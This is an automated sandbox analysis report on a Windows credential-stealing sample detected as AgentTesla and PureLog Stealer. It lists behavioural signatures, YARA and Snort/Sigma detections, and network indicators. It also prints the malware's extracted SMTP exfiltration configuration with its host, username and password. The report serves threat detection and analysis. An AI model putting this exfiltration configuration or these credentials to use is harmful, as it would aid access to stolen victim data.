Edit tour

Windows Analysis Report
GkYUK8VCrO.exe

Overview

General Information

Sample name:	GkYUK8VCrO.exe renamed because original name is a hash value
Original sample name:	7d50650cd2ba63482d4caf875ae65a8e.exe
Analysis ID:	1465576
MD5:	7d50650cd2ba63482d4caf875ae65a8e
SHA1:	037e5a7f82d5c436f744e5b7475f6264c32e6519
SHA256:	b54b494944a8b5268e3d3190c5a45af28afdada7eb0fc85fece3c22e2d31b3f1
Tags:	32exetrojan
Infos:

Detection

AgentTesla, PureLog Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Yara detected AgentTesla

Yara detected PureLog Stealer

.NET source code contains method to dynamically call methods (often used by packers)

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Contains VNC / remote desktop functionality (version string found)

Contains functionality to log keystrokes (.Net Source)

Installs a global keyboard hook

Machine Learning detection for sample

Maps a DLL or memory area into another process

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Switches to a custom stack to bypass stack traces

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Abnormal high CPU Usage

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (date check)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Suspicious Outbound SMTP Connections

Uses 32bit PE files

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

GkYUK8VCrO.exe (PID: 7448 cmdline: "C:\Users\user\Desktop\GkYUK8VCrO.exe" MD5: 7D50650CD2BA63482D4CAF875AE65A8E)

RegSvcs.exe (PID: 7464 cmdline: "C:\Users\user\Desktop\GkYUK8VCrO.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

GkYUK8VCrO.exe (PID: 7472 cmdline: "C:\Users\user\Desktop\GkYUK8VCrO.exe" MD5: 7D50650CD2BA63482D4CAF875AE65A8E)

RegSvcs.exe (PID: 7516 cmdline: "C:\Users\user\Desktop\GkYUK8VCrO.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://0xmrmagnezi.github.io/malware%20analysis/AgentTesla/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.fasmacopy.gr", "Username": "info@fasmacopy.gr", "Password": "Fam28sjd"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000002.1694565246.00000000036C0000.00000004.00001000.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 8F 88 44 24 2B 88 44 24 2F B0 25 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
00000003.00000002.4153513364.0000000005870000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.4153513364.0000000005870000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000003.00000002.4153513364.0000000005870000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000003.00000002.4153513364.0000000005870000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x403ad:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x4041f:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x404a9:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x4053b:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x405a5:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x40617:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x406ad:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x4073d:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
00000000.00000002.1682393372.0000000003530000.00000004.00001000.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 8F 88 44 24 2B 88 44 24 2F B0 25 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
00000003.00000002.4152521685.00000000044B5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.4152521685.00000000044B5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000003.00000002.4152521685.00000000044B5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000003.00000002.4151126152.000000000347C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.4151126152.000000000347C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000003.00000002.4153770965.0000000005900000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.4153770965.0000000005900000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000003.00000002.4153770965.0000000005900000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000003.00000002.4153770965.0000000005900000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3f4c5:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x3f537:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x3f5c1:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x3f653:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3f6bd:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3f72f:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x3f7c5:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x3f855:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
00000003.00000002.4149885312.0000000000400000.00000040.80000000.00040000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 8F 88 44 24 2B 88 44 24 2F B0 25 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
00000003.00000002.4150816380.0000000002FBE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.4150816380.0000000002FBE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000003.00000002.4150816380.0000000002FBE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 7516	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 7516	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Click to see the 16 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
3.2.RegSvcs.exe.400000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 8F 88 44 24 2B 88 44 24 2F B0 25 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
3.2.RegSvcs.exe.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 8F 88 44 24 2B 88 44 24 2F B0 25 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
3.2.RegSvcs.exe.2fffe36.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.RegSvcs.exe.2fffe36.2.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
3.2.RegSvcs.exe.2fffe36.2.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.2.RegSvcs.exe.2fffe36.2.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3d6c5:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x3d737:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x3d7c1:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x3d853:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3d8bd:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3d92f:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x3d9c5:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x3da55:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
3.2.RegSvcs.exe.5870ee8.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.RegSvcs.exe.5870ee8.4.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
3.2.RegSvcs.exe.5870ee8.4.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.2.RegSvcs.exe.5870ee8.4.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3d6c5:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x3d737:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x3d7c1:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x3d853:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3d8bd:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3d92f:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x3d9c5:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x3da55:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
3.2.RegSvcs.exe.5900000.5.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.RegSvcs.exe.5900000.5.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
3.2.RegSvcs.exe.5900000.5.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.2.RegSvcs.exe.5900000.5.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3d6c5:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x3d737:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x3d7c1:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x3d853:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3d8bd:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3d92f:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x3d9c5:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x3da55:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
3.2.RegSvcs.exe.2ffef4e.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.RegSvcs.exe.2ffef4e.1.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
3.2.RegSvcs.exe.2ffef4e.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.2.RegSvcs.exe.2ffef4e.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x403ad:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x4041f:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x404a9:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x4053b:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x405a5:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x40617:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x406ad:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x4073d:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
3.2.RegSvcs.exe.5870000.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.RegSvcs.exe.5870000.3.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
3.2.RegSvcs.exe.5870000.3.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.2.RegSvcs.exe.5870000.3.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3e5ad:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x3e61f:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x3e6a9:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x3e73b:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3e7a5:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3e817:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x3e8ad:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x3e93d:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
3.2.RegSvcs.exe.2ffef4e.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.RegSvcs.exe.2ffef4e.1.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
3.2.RegSvcs.exe.2ffef4e.1.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.2.RegSvcs.exe.2ffef4e.1.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3e5ad:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x3e61f:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x3e6a9:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x3e73b:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3e7a5:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3e817:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x3e8ad:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x3e93d:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
3.2.RegSvcs.exe.2fffe36.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.RegSvcs.exe.2fffe36.2.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
3.2.RegSvcs.exe.2fffe36.2.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.2.RegSvcs.exe.2fffe36.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3f4c5:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x3f537:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x3f5c1:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x3f653:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3f6bd:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3f72f:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x3f7c5:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x3f855:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.GkYUK8VCrO.exe.3530000.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 8F 88 44 24 2B 88 44 24 2F B0 25 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
2.2.GkYUK8VCrO.exe.36c0000.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 8F 88 44 24 2B 88 44 24 2F B0 25 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
3.2.RegSvcs.exe.5870000.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.RegSvcs.exe.5870000.3.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
3.2.RegSvcs.exe.5870000.3.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.2.RegSvcs.exe.5870000.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x403ad:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x4041f:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x404a9:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x4053b:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x405a5:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x40617:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x406ad:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x4073d:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
3.2.RegSvcs.exe.5900000.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.RegSvcs.exe.5900000.5.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
3.2.RegSvcs.exe.5900000.5.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.2.RegSvcs.exe.5900000.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3f4c5:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x3f537:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x3f5c1:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x3f653:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3f6bd:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3f72f:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x3f7c5:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x3f855:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
3.2.RegSvcs.exe.5870ee8.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.RegSvcs.exe.5870ee8.4.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
3.2.RegSvcs.exe.5870ee8.4.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.2.RegSvcs.exe.5870ee8.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3f4c5:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x3f537:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x3f5c1:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x3f653:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3f6bd:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3f72f:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x3f7c5:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x3f855:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
Click to see the 39 entries

Sigma Signatures

System Summary

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DestinationIp: 79.170.44.32, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Initiated: true, ProcessId: 7516, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49731

Snort Signatures

ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 - Source IP: 192.168.2.4 - Destination IP: 79.170.44.32

Timestamp:	07/01/24-20:28:15.672861
SID:	2840032
Source Port:	49746
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Agent Tesla Telegram Exfil - Source IP: 192.168.2.4 - Destination IP: 79.170.44.32

Timestamp:	07/01/24-20:27:10.465136
SID:	2851779
Source Port:	49739
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Agent Tesla Telegram Exfil - Source IP: 192.168.2.4 - Destination IP: 79.170.44.32

